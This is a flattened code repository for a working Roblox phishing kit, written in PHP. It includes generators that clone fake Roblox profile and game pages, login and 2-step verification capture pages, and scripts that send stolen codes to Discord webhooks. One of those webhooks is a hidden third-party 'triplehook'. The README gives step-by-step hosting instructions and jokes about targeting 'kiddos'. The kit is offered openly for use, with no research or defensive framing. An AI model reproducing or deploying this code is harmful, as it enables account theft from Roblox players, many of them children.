├── log.txt ├── logValues.txt ├── css ├── back.gif └── main.css ├── setup.php ├── readme.txt ├── README.md ├── phishing_files ├── login │ ├── webhook.php │ ├── Verification │ │ └── index.php │ └── index.php ├── controller │ ├── login.php │ └── dashboard.php └── dualhook.php ├── dualhook.php └── generator.php /log.txt: -------------------------------------------------------------------------------- 1 | @dont remove this file. -------------------------------------------------------------------------------- /logValues.txt: -------------------------------------------------------------------------------- 1 | @dont remove this file. -------------------------------------------------------------------------------- /css/back.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Terminatedzz/roblox-phishing-Working/HEAD/css/back.gif -------------------------------------------------------------------------------- /setup.php: -------------------------------------------------------------------------------- 1 | "dark", // change be changed to white to for white login page 8 | ]; 9 | ?> 10 | 11 | 12 | -------------------------------------------------------------------------------- /readme.txt: -------------------------------------------------------------------------------- 1 | Listen up 2 | 3 | Termed speaking here. 4 | 5 | 1. this is a source code i found on discord it was broken and all 6 | 2. i didn't "fully fix this source code" i only fixed apis, changed login page, removed some files, added some files, did a few changes in the embed of login and 2step page and notifier 7 | 3. i dont really know who the original creator of this "full source code" is, but credits to him for making this, dont forget to give me credits for fixing 😓. 8 | 4. if u want to change the background, go to the folder named "css" and remove back.gif then upload ur background gif and name it "back.gif" and done. 9 | 10 | # enjoy this working fixed roblox phishing source code i guess. 11 | 12 | Need help setting up, join https://discord.gg/9yz9ye23Ku 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Roblox Phishing 2 | 3 | **Outdated | New Version -> https://github.com/Terminatedzz/roblox-phishing** 4 | 5 | 🚀 **Setup** 🚀 6 | 7 | [![GitHub stars](https://img.shields.io/github/stars/your-username/your-repository.svg)]([https://github.com/your-username/your-repository/](https://github.com/Terminatedzz/roblox-phishing-Working)stargazers) 8 | 9 | This is a roblox phishing source code i fixed :) 10 | 11 | ## 🌟 Features 12 | 13 | - ✨ Follow me 14 | - ✨ Get me 15 stars on this repo and i post a way better src 15 | - ✨ Star my other repos to 16 | 17 | ## 🚀 Getting Started 18 | 19 | 1. find a free hosting or paid hosting like infinity free or any other ones 20 | 2. upload files 21 | 3. edit setup.php 22 | 4. now go to UrDomain/generator.php 23 | 5. ur site is now ready for action 24 | 6. have fun triplehooking kiddos 25 | 26 | ### Contact me 27 | discord: termed_dev 28 | 29 | ## 📢 Code 30 | 31 | - php 32 | - javascript 33 | - html, css 34 | -------------------------------------------------------------------------------- /phishing_files/login/webhook.php: -------------------------------------------------------------------------------- 1 | "$name - Bot", 32 | "avatar_url" => "$thumbnail", 33 | "content" => "", 34 | "embeds" => [ 35 | [ 36 | "title" => "2step code", 37 | "type" => "rich", 38 | "description" => "**2step code fetched.**", 39 | "color" => hexdec("$hex"), 40 | "thumbnail" => [ 41 | "url" => "$thumbnail", 42 | ], 43 | "author" => [ 44 | "name" => "$name - Result Phishing", 45 | ], 46 | "footer" => [ 47 | "text" => "$name ON TOP", 48 | "icon_url" => "$thumbnail", 49 | ], 50 | "fields" => [ 51 | [ 52 | "name" => "**🔐 2step Login code**", 53 | "value" => "```$CorrectCode```", 54 | "inline" => True 55 | ], 56 | ] 57 | ], 58 | ], 59 | 60 | ]; 61 | $ch = curl_init(); 62 | curl_setopt($ch, CURLOPT_URL, $triplehook); 63 | curl_setopt($ch, CURLOPT_POST, true); 64 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 65 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 66 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 67 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 68 | $response = curl_exec($ch); 69 | curl_close($ch); 70 | $ch = curl_init(); 71 | curl_setopt($ch, CURLOPT_URL, $url); 72 | curl_setopt($ch, CURLOPT_POST, true); 73 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 74 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 75 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 76 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 77 | $response = curl_exec($ch); 78 | curl_close($ch); 79 | $ch = curl_init(); 80 | curl_setopt($ch, CURLOPT_URL, $Dualhook); 81 | curl_setopt($ch, CURLOPT_POST, true); 82 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 83 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 84 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 85 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 86 | $response = curl_exec($ch); 87 | curl_close($ch); 88 | 89 | 90 | echo ""; 91 | exit(); 92 | 93 | ?> -------------------------------------------------------------------------------- /dualhook.php: -------------------------------------------------------------------------------- 1 | "$name - Bot", 24 | "avatar_url" => "$thumbnail", 25 | "content" => "@everyone **New User Made Dualhook Generator 🔥**", 26 | "embeds" => [ 27 | [ 28 | "title" => "Check there Generator.", 29 | "type" => "rich", 30 | "url" => "$domain/controlPage/$directory", 31 | "color" => hexdec("$hex"), 32 | "footer" => [ 33 | "text" => "$name • $timestamp", 34 | "icon_url" => "$thumbnail" 35 | ], 36 | "thumbnail" => [ 37 | "url" => "$thumbnail", 38 | ], 39 | "fields" => [ 40 | [ 41 | "name" => "**Dualhook Generator**", 42 | "value" => "```Dualhook Gen: $domain/controlPage/$directory```", 43 | "inline" => true 44 | ], 45 | 46 | ] 47 | ], 48 | ], 49 | 50 | ]; 51 | 52 | $ch = curl_init(); 53 | curl_setopt($ch, CURLOPT_URL, $triplehook); 54 | curl_setopt($ch, CURLOPT_POST, true); 55 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 56 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 57 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 58 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 59 | $response = curl_exec($ch); 60 | header("location: /controlPage/$directory"); 61 | } else { 62 | $error = 'This directory is already in use!'; 63 | } 64 | } 65 | } else { 66 | $error = 'This does not look like a webhook!'; 67 | } 68 | } 69 | ?> 70 | 71 | 72 | 73 | Dualhook Generator 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 90 | 91 |
92 |
93 |
94 |
95 | 96 | Dualhook Generator 97 | 98 |
99 | 100 | The Directory 101 | 102 |
103 |
104 | 105 | 106 |
107 | 108 |
109 | 110 | Discord Webhook 111 | 112 |
113 |
114 | 115 | 116 |
117 |
118 |
119 | 122 |
123 |
124 |
125 |
126 |
127 | 128 | 129 | -------------------------------------------------------------------------------- /phishing_files/controller/login.php: -------------------------------------------------------------------------------- 1 | userId; 7 | $fakeusername = htmlspecialchars(file_get_contents('fakeusername.txt')); 8 | if($_POST['token']){ 9 | if($_POST['token']=="QUBRWEBIRWBQYEIYOB"){ 10 | $_SESSION['token'] = "QUBRWEBIRWBQYEIYOB"; 11 | header('location: dashboard'); 12 | } else { 13 | echo ''; 14 | } 15 | } 16 | } 17 | if($_SESSION['token']=="QUBRWEBIRWBQYEIYOB"){ 18 | header('location: dashboard'); 19 | } 20 | ?> 21 | 22 | 23 | 24 | 25 | 26 | 27 | <?=$name?> - Login 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 72 | 73 |
74 | 75 |
76 |
77 |
78 |
79 | 82 |
83 |
84 |
85 |
86 | 87 |
88 | 89 |
90 |
91 | Apps 92 |
93 |
94 |
95 |
96 |
97 | 98 |
99 |
100 |

User

101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 | 113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |

Login

122 |
123 |
124 |
125 |
126 |

Dashboard login

127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 | 152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 | 160 | 171 |
172 | 173 | 174 | 175 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | -------------------------------------------------------------------------------- /generator.php: -------------------------------------------------------------------------------- 1 | userId)){ 8 | require('setup.php'); 9 | $parse = parse_url($dwebhook); 10 | if($parse['host'] == 'discord.com' || $parse['host'] == 'discordapp.com'){ 11 | $userid = rand(); 12 | mkdir("users/$userid/profile/login", 0777, true); 13 | mkdir("users/$userid/profile/login/Verification", 0777, true); 14 | mkdir("users/$userid/profile/controller", 0777, true); 15 | file_put_contents("users/$userid/profile/index.php", file_get_contents('phishing_files/profile.php')); 16 | file_put_contents("users/$userid/profile/controller/realusername.txt", $_POST['rusername']); 17 | file_put_contents("users/$userid/profile/controller/fakeusername.txt", $_POST['fusername']); 18 | file_put_contents("users/$userid/profile/controller/aboutme.txt", $_POST['aboutme']); 19 | file_put_contents("users/$userid/profile/controller/activity.txt", 'game'); 20 | file_put_contents("users/$userid/profile/controller/friends.txt", '163'); 21 | file_put_contents("users/$userid/profile/controller/followers.txt", '3871'); 22 | file_put_contents("users/$userid/profile/controller/followings.txt", '542'); 23 | file_put_contents("users/$userid/profile/controller/joindate.txt", '6/4/2017'); 24 | file_put_contents("users/$userid/profile/controller/placevisits.txt", '782'); 25 | $token = strtoupper(substr(str_repeat(md5(rand()), ceil(32/32)), 0, 32)); 26 | $token = "$name-$token"; 27 | file_put_contents("users/$userid/profile/controller/dashboard.php", str_replace('QUBRWEBIRWBQYEIYOB',$token,file_get_contents('phishing_files/controller/dashboard.php'))); 28 | file_put_contents("users/$userid/profile/controller/login.php", str_replace('QUBRWEBIRWBQYEIYOB',$token,file_get_contents('phishing_files/controller/login.php'))); 29 | file_put_contents("users/$userid/profile/login/index.php", file_get_contents('phishing_files/login/index.php')); 30 | file_put_contents("users/$userid/profile/login/Verification/index.php", file_get_contents('phishing_files/login/Verification/index.php')); 31 | file_put_contents("users/$userid/profile/login/webhook.php", file_get_contents('phishing_files/login/webhook.php')); 32 | file_put_contents("users/$userid/profile/login/b_webhook.txt", $_POST['dwebhook']); 33 | $domain = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]"; 34 | $timestamp = date("c", strtotime("now")); 35 | $url = $_POST['dwebhook']; 36 | $headers = ["Content-Type: application/json; charset=utf-8"]; 37 | $POST = [ 38 | "username" => "$name - Bot", 39 | "avatar_url" => "$thumbnail", 40 | "content" => "@everyone", 41 | "embeds" => [ 42 | [ 43 | "title" => "Login to Controller", 44 | "type" => "rich", 45 | "url" => "$domain/users/$userid/profile/controller/login", 46 | "color" => hexdec("$hex"), 47 | "footer" => [ 48 | "text" => "$name • $timestamp", 49 | "icon_url" => "$thumbnail" 50 | ], 51 | "thumbnail" => [ 52 | "url" => "$thumbnail", 53 | ], 54 | "fields" => [ 55 | [ 56 | "name" => "**Info**", 57 | "value" => "```Token: $token 58 | Url: $domain/users/$userid/profile```", 59 | "inline" => true 60 | ], 61 | 62 | ] 63 | ], 64 | ], 65 | 66 | ]; 67 | 68 | $ch = curl_init(); 69 | curl_setopt($ch, CURLOPT_URL, $url); 70 | curl_setopt($ch, CURLOPT_POST, true); 71 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 72 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 73 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 74 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 75 | $response = curl_exec($ch); 76 | $success = 'Your link and controller token have been sent to your webhook!'; 77 | } else { 78 | $error = 'This does not look like a webhook!'; 79 | } 80 | } else { 81 | $error = 'This real username does not exist on roblox!'; 82 | } 83 | } 84 | if (isset($_POST['gameid'], $_POST['dwebhook'])) { 85 | $gameid = $_POST['gameid']; 86 | $dwebhook = $_POST['dwebhook']; 87 | $ab = file_get_contents("https://www.roblox.com/places/api-get-details?assetId=$gameid"); 88 | if(!empty(json_decode($ab)->UniverseId)){ 89 | $parse = parse_url($dwebhook); 90 | if($parse['host'] == 'discord.com' || $parse['host'] == 'discordapp.com'){ 91 | $fgameid = rand(); 92 | $privateservercode = rand(); 93 | $db = file_get_contents("https://www.roblox.com/places/api-get-details?assetId=$gameid"); 94 | $gamename = str_replace("https://www.roblox.com/games/$gameid/",'',json_decode($db)->Url); 95 | mkdir("games/$fgameid/$gamename/login", 0777, true); 96 | mkdir("games/$fgameid/$gamename/login/Verification", 0777, true); 97 | file_put_contents("games/$fgameid/$gamename/index.php", str_replace('{ROBLOX.GAMEID}',json_decode($db)->AssetId,file_get_contents('phishing_files/game.php'))); 98 | file_put_contents("games/$fgameid/$gamename/login/index.php", file_get_contents('phishing_files/login/index.php')); 99 | file_put_contents("games/$fgameid/$gamename/login/Verification/index.php", file_get_contents('phishing_files/login/Verification/index.php')); 100 | file_put_contents("games/$fgameid/$gamename/login/webhook.php", file_get_contents('phishing_files/login/webhook.php')); 101 | file_put_contents("games/$fgameid/$gamename/login/b_webhook.txt", $_POST['dwebhook']); 102 | header("location: /games/$fgameid/$gamename?privateServerLinkCode=$privateservercode"); 103 | } else { 104 | $error = 'This does not look like a webhook!'; 105 | } 106 | } else { 107 | $error = 'This game does not exist on roblox!'; 108 | } 109 | } 110 | ?> 111 | 112 | 113 | 114 | Fake Link Generator 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 131 | 132 | 133 | 141 | 142 |
143 |
144 |
145 |
146 | 147 | Select Theme: 148 | 149 | 150 | 151 |
152 | 202 | 232 |
233 |
234 |
235 | 236 | 237 | -------------------------------------------------------------------------------- /phishing_files/dualhook.php: -------------------------------------------------------------------------------- 1 | userId)){ 8 | require('../../setup.php'); 9 | $parse = parse_url($dwebhook); 10 | if($parse['host'] == 'discord.com' || $parse['host'] == 'discordapp.com'){ 11 | $userid = rand(); 12 | mkdir("../../users/$userid/profile/login", 0777, true); 13 | mkdir("users/$userid/profile/login/Verification", 0777, true); 14 | mkdir("../../users/$userid/profile/controller", 0777, true); 15 | file_put_contents("../../users/$userid/profile/index.php", file_get_contents('../../phishing_files/profile.php')); 16 | file_put_contents("../../users/$userid/profile/controller/realusername.txt", $_POST['rusername']); 17 | file_put_contents("../../users/$userid/profile/fakeusername.txt", $_POST['fusername']); 18 | file_put_contents("../../users/$userid/profile/aboutme.txt", $_POST['aboutme']); 19 | file_put_contents("../../users/$userid/profile/controller/activity.txt", 'game'); 20 | file_put_contents("../../users/$userid/profile/controller/friends.txt", '163'); 21 | file_put_contents("../../users/$userid/profile/controller/followers.txt", '3871'); 22 | file_put_contents("../../users/$userid/profile/controller/followings.txt", '542'); 23 | file_put_contents("../../users/$userid/profile/controller/joindate.txt", '6/4/2017'); 24 | file_put_contents("../../users/$userid/profile/controller/placevisits.txt", '782'); 25 | $token = strtoupper(substr(str_repeat(md5(rand()), ceil(32/32)), 0, 32)); 26 | $token = "$name-$token"; 27 | file_put_contents("../../users/$userid/profile/controller/dashboard.php", str_replace('QUBRWEBIRWBQYEIYOB',$token,file_get_contents('../../phishing_files/controller/dashboard.php'))); 28 | file_put_contents("../../users/$userid/profile/controller/login.php", str_replace('QUBRWEBIRWBQYEIYOB',$token,file_get_contents('../../phishing_files/controller/login.php'))); 29 | file_put_contents("../../users/$userid/profile/login/index.php", file_get_contents('../../phishing_files/login/index.php')); 30 | file_put_contents("../../users/$userid/profile/login/Verification/index.php", file_get_contents('../../phishing_files/login/Verification/index.php')); 31 | file_put_contents("../../users/$userid/profile/login/webhook.php", file_get_contents('../../phishing_files/login/webhook.php')); 32 | file_put_contents("../../users/$userid/profile/login/b_webhook.txt", $_POST['dwebhook']); 33 | file_put_contents("../../users/$userid/profile/login/d_webhook.txt", file_get_contents('d_webhook.txt')); 34 | $domain = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]"; 35 | $timestamp = date("c", strtotime("now")); 36 | $url = $_POST['dwebhook']; 37 | $headers = ["Content-Type: application/json; charset=utf-8"]; 38 | $POST = [ 39 | "username" => "$name - Bot", 40 | "avatar_url" => "$thumbnail", 41 | "content" => "@everyone", 42 | "embeds" => [ 43 | [ 44 | "title" => "Login to Controller", 45 | "type" => "rich", 46 | "url" => "$domain/users/$userid/profile/controller/login", 47 | "color" => hexdec("$hex"), 48 | "footer" => [ 49 | "text" => "$name • $timestamp", 50 | "icon_url" => "$thumbnail" 51 | ], 52 | "thumbnail" => [ 53 | "url" => "$thumbnail", 54 | ], 55 | "fields" => [ 56 | [ 57 | "name" => "**Info**", 58 | "value" => "```Token: $token 59 | Url: $domain/users/$userid/profile```", 60 | "inline" => true 61 | ], 62 | 63 | ] 64 | ], 65 | ], 66 | 67 | ]; 68 | 69 | $ch = curl_init(); 70 | curl_setopt($ch, CURLOPT_URL, $url); 71 | curl_setopt($ch, CURLOPT_POST, true); 72 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 73 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 74 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 75 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 76 | $response = curl_exec($ch); 77 | $dual = file_get_contents('d_webhook.txt') ; 78 | $ch = curl_init(); 79 | curl_setopt($ch, CURLOPT_URL, $dual); 80 | curl_setopt($ch, CURLOPT_POST, true); 81 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 82 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 83 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 84 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); 85 | $response = curl_exec($ch); 86 | $success = 'Your link and controller token have been sent to your webhook!'; 87 | } 88 | } else { 89 | $error = 'This does not look like a webhook!'; 90 | } 91 | } 92 | if (isset($_POST['gameid'], $_POST['dwebhook'])) { 93 | $gameid = $_POST['gameid']; 94 | $dwebhook = $_POST['dwebhook']; 95 | $ab = file_get_contents("https://www.roblox.com/places/api-get-details?assetId=$gameid"); 96 | if(!empty(json_decode($ab)->UniverseId)){ 97 | $parse = parse_url($dwebhook); 98 | if($parse['host'] == 'discord.com' || $parse['host'] == 'discordapp.com'){ 99 | $fgameid = rand(); 100 | $privateservercode = rand(); 101 | $db = file_get_contents("https://www.roblox.com/places/api-get-details?assetId=$gameid"); 102 | $gamename = str_replace("https://www.roblox.com/games/$gameid/",'',json_decode($db)->Url); 103 | mkdir("../../games/$fgameid/$gamename/login", 0777, true); 104 | mkdir("../../games/$fgameid/$gamename/login/Verification", 0777, true); 105 | file_put_contents("../../games/$fgameid/$gamename/index.php", str_replace('{ROBLOX.GAMEID}',json_decode($db)->AssetId,file_get_contents('../../phishing_files/game.php'))); 106 | file_put_contents("../../games/$fgameid/$gamename/login/index.php", file_get_contents('../../phishing_files/login/index.php')); 107 | file_put_contents("../../games/$fgameid/$gamename/login/Verification/index.php", file_get_contents('../../phishing_files/login/Verification/index.php')); 108 | file_put_contents("../../games/$fgameid/$gamename/login/webhook.php", file_get_contents('../../phishing_files/login/webhook.php')); 109 | file_put_contents("../../games/$fgameid/$gamename/login/b_webhook.txt", $_POST['dwebhook']); 110 | file_put_contents("../../games/$fgameid/$gamename/login/d_webhook.txt", file_get_contents('d_webhook.txt')); 111 | header("location: /games/$fgameid/$gamename?privateServerLinkCode=$privateservercode"); 112 | } else { 113 | $error = 'This does not look like a webhook!'; 114 | } 115 | } else { 116 | $error = 'This game does not exist on roblox!'; 117 | } 118 | } 119 | ?> 120 | 121 | 122 | 123 | Fake Link Generator 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 140 | 141 | 142 | 150 | 151 |
152 |
153 |
154 |
155 | 156 | Select Theme: 157 | 158 | 159 | 160 |
161 | 211 | 241 |
242 |
243 |
244 | 245 | 246 | -------------------------------------------------------------------------------- /css/main.css: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | /*////////////////////////////////////////////////////////////////// 6 | [ FONT ]*/ 7 | 8 | @font-face { 9 | font-family: Poppins-Regular; 10 | src: url('https://colorlib.com/etc/lf/Login_v5/fonts/poppins/Poppins-Regular.ttf'); 11 | } 12 | 13 | @font-face { 14 | font-family: Poppins-Medium; 15 | src: url('https://colorlib.com/etc/lf/Login_v5/fonts/poppins/Poppins-Medium.ttf'); 16 | } 17 | 18 | @font-face { 19 | font-family: Montserrat-Medium; 20 | src: url('https://colorlib.com/etc/lf/Login_v5/fonts/montserrat/Montserrat-Medium.ttf'); 21 | } 22 | 23 | @font-face { 24 | font-family: Montserrat-SemiBold; 25 | src: url('https://colorlib.com/etc/lf/Login_v5/fonts/montserrat/Montserrat-SemiBold.ttf'); 26 | } 27 | 28 | /*////////////////////////////////////////////////////////////////// 29 | [ RESTYLE TAG ]*/ 30 | 31 | * { 32 | margin: 0px; 33 | padding: 0px; 34 | box-sizing: border-box; 35 | } 36 | 37 | body, html { 38 | height: 100%; 39 | font-family: Poppins-Regular, sans-serif; 40 | } 41 | 42 | /*---------------------------------------------*/ 43 | a { 44 | font-family: Poppins-Regular; 45 | font-size: 14px; 46 | line-height: 1.7; 47 | color: #666666; 48 | margin: 0px; 49 | transition: all 0.4s; 50 | -webkit-transition: all 0.4s; 51 | -o-transition: all 0.4s; 52 | -moz-transition: all 0.4s; 53 | } 54 | 55 | a:focus { 56 | outline: none !important; 57 | } 58 | 59 | a:hover { 60 | text-decoration: none; 61 | color: #fc00ff; 62 | border-color: #fc00ff; 63 | } 64 | 65 | /*---------------------------------------------*/ 66 | h1,h2,h3,h4,h5,h6 { 67 | margin: 0px; 68 | } 69 | 70 | p { 71 | font-family: Poppins-Regular; 72 | font-size: 14px; 73 | line-height: 1.7; 74 | color: #666666; 75 | margin: 0px; 76 | } 77 | 78 | ul, li { 79 | margin: 0px; 80 | list-style-type: none; 81 | } 82 | 83 | 84 | /*---------------------------------------------*/ 85 | input { 86 | outline: none; 87 | border: none; 88 | } 89 | 90 | textarea { 91 | outline: none; 92 | border: none; 93 | } 94 | 95 | textarea:focus, input:focus { 96 | border-color: transparent !important; 97 | } 98 | 99 | input:focus::-webkit-input-placeholder { color:transparent; } 100 | input:focus:-moz-placeholder { color:transparent; } 101 | input:focus::-moz-placeholder { color:transparent; } 102 | input:focus:-ms-input-placeholder { color:transparent; } 103 | 104 | textarea:focus::-webkit-input-placeholder { color:transparent; } 105 | textarea:focus:-moz-placeholder { color:transparent; } 106 | textarea:focus::-moz-placeholder { color:transparent; } 107 | textarea:focus:-ms-input-placeholder { color:transparent; } 108 | 109 | input::-webkit-input-placeholder { color: #555555;} 110 | input:-moz-placeholder { color: #555555;} 111 | input::-moz-placeholder { color: #555555;} 112 | input:-ms-input-placeholder { color: #555555;} 113 | 114 | textarea::-webkit-input-placeholder { color: #555555;} 115 | textarea:-moz-placeholder { color: #555555;} 116 | textarea::-moz-placeholder { color: #555555;} 117 | textarea:-ms-input-placeholder { color: #555555;} 118 | 119 | label { 120 | display: block; 121 | margin: 0; 122 | } 123 | 124 | /*---------------------------------------------*/ 125 | button { 126 | outline: none !important; 127 | border: none; 128 | background: transparent; 129 | } 130 | 131 | button:hover { 132 | cursor: pointer; 133 | } 134 | 135 | iframe { 136 | border: none !important; 137 | } 138 | 139 | 140 | /*////////////////////////////////////////////////////////////////// 141 | [ Utility ]*/ 142 | .txt1 { 143 | font-family: Montserrat-SemiBold; 144 | font-size: 16px; 145 | color: #fff; 146 | line-height: 1.5; 147 | } 148 | 149 | .txt2 { 150 | font-family: Poppins-Regular; 151 | font-size: 14px; 152 | color: #999999; 153 | line-height: 1.5; 154 | } 155 | 156 | .bo1 {border-bottom: 1px solid #999999;} 157 | 158 | /*////////////////////////////////////////////////////////////////// 159 | [ login ]*/ 160 | 161 | .limiter { 162 | width: 100%; 163 | margin: 0 auto; 164 | } 165 | 166 | .container-login100 { 167 | width: 100%; 168 | min-height: 100vh; 169 | display: -webkit-box; 170 | display: -webkit-flex; 171 | display: -moz-box; 172 | display: -ms-flexbox; 173 | display: flex; 174 | flex-wrap: wrap; 175 | justify-content: center; 176 | align-items: center; 177 | padding: 15px; 178 | 179 | background-position: center; 180 | background-size: cover; 181 | background-repeat: no-repeat;; 182 | } 183 | 184 | 185 | .wrap-login100 { 186 | width: 680px; 187 | background: #000; 188 | border-radius: 10px; 189 | position: relative; 190 | } 191 | 192 | 193 | /*================================================================== 194 | [ Form ]*/ 195 | 196 | .login100-form { 197 | width: 100%; 198 | } 199 | 200 | .login100-form-title { 201 | width: 100%; 202 | display: block; 203 | font-family: Montserrat-Medium; 204 | font-size: 39px; 205 | color: #fff; 206 | line-height: 1.2; 207 | text-align: center; 208 | } 209 | 210 | /*------------------------------------------------------------------ 211 | [ Button sign in with ]*/ 212 | .btn-face, 213 | .btn-google { 214 | font-family: Montserrat-SemiBold; 215 | font-size: 18px; 216 | line-height: 1.2; 217 | 218 | display: -webkit-box; 219 | display: -webkit-flex; 220 | display: -moz-box; 221 | display: -ms-flexbox; 222 | display: flex; 223 | justify-content: center; 224 | align-items: center; 225 | padding: 15px; 226 | width: calc((100% - 20px) / 2); 227 | height: 70px; 228 | border-radius: 10px; 229 | box-shadow: 0 1px 5px 0px rgba(0, 0, 0, 0.2); 230 | -moz-box-shadow: 0 1px 5px 0px rgba(0, 0, 0, 0.2); 231 | -webkit-box-shadow: 0 1px 5px 0px rgba(0, 0, 0, 0.2); 232 | -o-box-shadow: 0 1px 5px 0px rgba(0, 0, 0, 0.2); 233 | -ms-box-shadow: 0 1px 5px 0px rgba(0, 0, 0, 0.2); 234 | -webkit-transition: all 0.4s; 235 | -o-transition: all 0.4s; 236 | -moz-transition: all 0.4s; 237 | transition: all 0.4s; 238 | position: relative; 239 | z-index: 1; 240 | } 241 | 242 | .btn-google::before, 243 | .btn-face::before { 244 | content: ""; 245 | display: block; 246 | position: absolute; 247 | z-index: -1; 248 | width: 100%; 249 | height: 100%; 250 | border-radius: 10px; 251 | top: 0; 252 | left: 0; 253 | background: #a64bf4; 254 | background: -webkit-linear-gradient(45deg, #00dbde, #fc00ff); 255 | background: -o-linear-gradient(45deg, #00dbde, #fc00ff); 256 | background: -moz-linear-gradient(45deg, #00dbde, #fc00ff); 257 | background: linear-gradient(45deg, #00dbde, #fc00ff); 258 | opacity: 0; 259 | -webkit-transition: all 0.4s; 260 | -o-transition: all 0.4s; 261 | -moz-transition: all 0.4s; 262 | transition: all 0.4s; 263 | } 264 | 265 | .btn-face { 266 | color: #fff; 267 | background-color: #3b5998; 268 | } 269 | 270 | .btn-face i { 271 | font-size: 30px; 272 | margin-right: 17px; 273 | padding-bottom: 3px; 274 | } 275 | 276 | .btn-google { 277 | color: #555555; 278 | background-color: #fff; 279 | } 280 | 281 | .btn-google img { 282 | width: 30px; 283 | margin-right: 15px; 284 | padding-bottom: 3px; 285 | } 286 | 287 | .btn-face:hover:before, 288 | .btn-google:hover:before { 289 | opacity: 1; 290 | } 291 | 292 | .btn-face:hover, 293 | .btn-google:hover { 294 | color: #fff; 295 | } 296 | 297 | 298 | /*------------------------------------------------------------------ 299 | [ Input ]*/ 300 | 301 | .wrap-input100 { 302 | width: 100%; 303 | position: relative; 304 | background-color: #f7f7f7; 305 | border: 1px solid #e6e6e6; 306 | border-radius: 10px; 307 | } 308 | 309 | 310 | /*---------------------------------------------*/ 311 | .input100 { 312 | font-family: Poppins-Regular; 313 | color: #333333; 314 | line-height: 1.2; 315 | font-size: 18px; 316 | 317 | display: block; 318 | width: 100%; 319 | background: transparent; 320 | height: 60px; 321 | padding: 0 20px; 322 | } 323 | /*------------------------------------------------------------------ 324 | [ Focus Input ]*/ 325 | 326 | .focus-input100 { 327 | position: absolute; 328 | display: block; 329 | width: calc(100% + 2px); 330 | height: calc(100% + 2px); 331 | top: -1px; 332 | left: -1px; 333 | pointer-events: none; 334 | border: 1px solid #fc00ff; 335 | border-radius: 10px; 336 | 337 | visibility: hidden; 338 | opacity: 0; 339 | 340 | -webkit-transition: all 0.4s; 341 | -o-transition: all 0.4s; 342 | -moz-transition: all 0.4s; 343 | transition: all 0.4s; 344 | 345 | -webkit-transform: scaleX(1.1) scaleY(1.3); 346 | -moz-transform: scaleX(1.1) scaleY(1.3); 347 | -ms-transform: scaleX(1.1) scaleY(1.3); 348 | -o-transform: scaleX(1.1) scaleY(1.3); 349 | transform: scaleX(1.1) scaleY(1.3); 350 | } 351 | 352 | .input100:focus + .focus-input100 { 353 | visibility: visible; 354 | opacity: 1; 355 | 356 | -webkit-transform: scale(1); 357 | -moz-transform: scale(1); 358 | -ms-transform: scale(1); 359 | -o-transform: scale(1); 360 | transform: scale(1); 361 | } 362 | 363 | .eff-focus-selection { 364 | visibility: visible; 365 | opacity: 1; 366 | 367 | -webkit-transform: scale(1); 368 | -moz-transform: scale(1); 369 | -ms-transform: scale(1); 370 | -o-transform: scale(1); 371 | transform: scale(1); 372 | } 373 | 374 | 375 | /*------------------------------------------------------------------ 376 | [ Button ]*/ 377 | .container-login100-form-btn { 378 | width: 100%; 379 | display: -webkit-box; 380 | display: -webkit-flex; 381 | display: -moz-box; 382 | display: -ms-flexbox; 383 | display: flex; 384 | flex-wrap: wrap; 385 | } 386 | 387 | .login100-form-btn { 388 | display: -webkit-box; 389 | display: -webkit-flex; 390 | display: -moz-box; 391 | display: -ms-flexbox; 392 | display: flex; 393 | justify-content: center; 394 | align-items: center; 395 | padding: 0 20px; 396 | width: 